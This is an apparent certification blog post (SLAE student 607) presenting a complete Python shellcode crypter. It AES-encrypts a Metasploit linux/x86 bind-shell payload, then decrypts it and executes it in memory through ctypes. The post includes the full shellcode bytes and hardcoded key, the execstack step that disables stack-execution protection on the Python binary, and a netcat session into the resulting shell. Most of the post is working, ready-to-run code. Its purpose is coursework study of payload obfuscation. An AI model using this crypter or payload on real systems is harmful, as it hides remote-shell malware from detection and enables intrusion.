I have created a single python file for this task - for easy testing.
The python file encrypts the payload with AES, prints the encrypted payload, decrypts it, and runs it in python.
Before I was able to run the shellcode in python, I had to enable stack execution on the python binary. Otherwise, I'm greeted with a nice Segmentation fault ... :
root@myserver:/home/ubuntu/SLAE_temp/7_crypter# ./shellcode.py ... Segmentation fault (core dumped) root@myserver:/home/ubuntu/SLAE_temp/7_crypter# execstack -q /usr/bin/python - /usr/bin/python root@myserver:/home/ubuntu/SLAE_temp/7_crypter# execstack -s /usr/bin/python root@myserver:/home/ubuntu/SLAE_temp/7_crypter# execstack -q /usr/bin/python X /usr/bin/pythonNow that it is disabled, let's see my code (https://github.com/Z6543/My_SLAE/blob/master/07_encrypted_shellcode/encrypted_shellcode.py):
#!/usr/bin/python
#Author: Zoltan Balazs
#SLAE 607
from ctypes import *
from Crypto.Cipher import AES
import base64
import os
def print_shellcode(shellcode):
encoded = ""
for x in bytearray(shellcode):
value = x
encoded += '\\x'
encoded += '%02x' % value
print encoded
BLOCK_SIZE = 32
PADDING = '{'
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
EncryptAES = lambda c, s: c.encrypt(pad(s))
DecryptAES = lambda c, e: c.decrypt(e).rstrip(PADDING)
#secret = base64.b64encode(os.urandom(BLOCK_SIZE))
secret = (base64.b64decode("7dXwb5giAn7bJGp1VNfmu29oDK2r0mUkEEf9gVrtRE4="))
cipher = AES.new(secret)
#output of msfvenom -p linux/x86/shell_bind_tcp -f python -e x86/shikata_ga_nai LPORT=12345
buf = ""
buf += "\xb8\x35\x93\x35\x4b\xda\xc6\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x14\x83\xef\xfc\x31\x47\x10\x03\x47\x10\xd7"
buf += "\x66\x04\x90\xe0\x6a\x34\x65\x5d\x07\xb9\xe0\x80\x67"
buf += "\xdb\x3f\xc2\xd3\x7a\x92\xaa\xe1\x82\x22\x13\x8c\x92"
buf += "\x13\x33\xd9\x72\xf9\xd5\x81\xb9\x7e\x90\x73\x46\xcc"
buf += "\xa6\xc3\x20\xff\x26\x60\x1d\x99\xeb\xe7\xce\x3f\x99"
buf += "\xd8\xa8\x72\xdd\x6e\x30\x75\xb5\x5f\xed\xf6\x2d\xc8"
buf += "\xde\x9a\xc4\x66\xa8\xb8\x46\x24\x23\xdf\xd6\xc1\xfe"
buf += "\xa0"
# encrypt a string
encrypted_shellcode = EncryptAES(cipher, buf)
print 'Encrypted shellcode ...'
print_shellcode(encrypted_shellcode)
# decrypt the encrypted string
decrypted = DecryptAES(cipher, encrypted_shellcode)
print 'Decrypted shellcode ...'
print_shellcode(decrypted)
memorywithshell = create_string_buffer(decrypted, len(decrypted))
print (len(decrypted))
shellcode = cast(memorywithshell, CFUNCTYPE(c_void_p))
shellcode()
Let's test this:
root@myserver:/home/ubuntu/SLAE_temp/7_crypter# ./shellcode.py Encrypted shellcode ... \x1a\xa5\x0a\xe3\x2a\x2f\x95\x95\x29\x83\x21\xef\x5e\x9e\x6e\x91\xe0\x6c\x1c\xc9\xa1\x58\x29\x77\x4a\x4d\xbe\x3f\x4a\x76\xfb\x02\xfa\x38\xf3\x6d\xc4\x16\xcb\xfb\x34\x60\x04\x49\xf9\xc7\x3c\x12\xd8\x1c\xa7\x8f\x26\x9e\xf4\xe3\xe3\x4e\xdb\xc7\x82\x13\x23\x65\xc7\x03\x59\x79\xa6\x04\xe4\x3d\x3b\x48\x57\xee\xa9\xec\x85\xc3\xfb\x74\x9a\xc9\xe2\x33\x0a\x13\x56\x5c\x67\xe6\xd9\x91\xd9\xdf\xc6\x92\xea\xda\x6b\x27\x14\x5c\x7c\x7d\x96\x6a\xd3\xb7\x87\xd0\x69\xf8\x3d\xd4\xc7\x00\x6b\xe3\x4d\xf7\xc7\x88\x26\x9a\x08\x3f Decrypted shellcode ... \xb8\x35\x93\x35\x4b\xda\xc6\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1\x14\x83\xef\xfc\x31\x47\x10\x03\x47\x10\xd7\x66\x04\x90\xe0\x6a\x34\x65\x5d\x07\xb9\xe0\x80\x67\xdb\x3f\xc2\xd3\x7a\x92\xaa\xe1\x82\x22\x13\x8c\x92\x13\x33\xd9\x72\xf9\xd5\x81\xb9\x7e\x90\x73\x46\xcc\xa6\xc3\x20\xff\x26\x60\x1d\x99\xeb\xe7\xce\x3f\x99\xd8\xa8\x72\xdd\x6e\x30\x75\xb5\x5f\xed\xf6\x2d\xc8\xde\x9a\xc4\x66\xa8\xb8\x46\x24\x23\xdf\xd6\xc1\xfe\xa0 105And in another window:
root@myserver:/home/ubuntu/SLAE_temp/7_crypter# nc 127.0.0.1 12345 ls shellcode.py
That's all folks! :)
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student-ID: SLAE - 607
No comments:
Post a Comment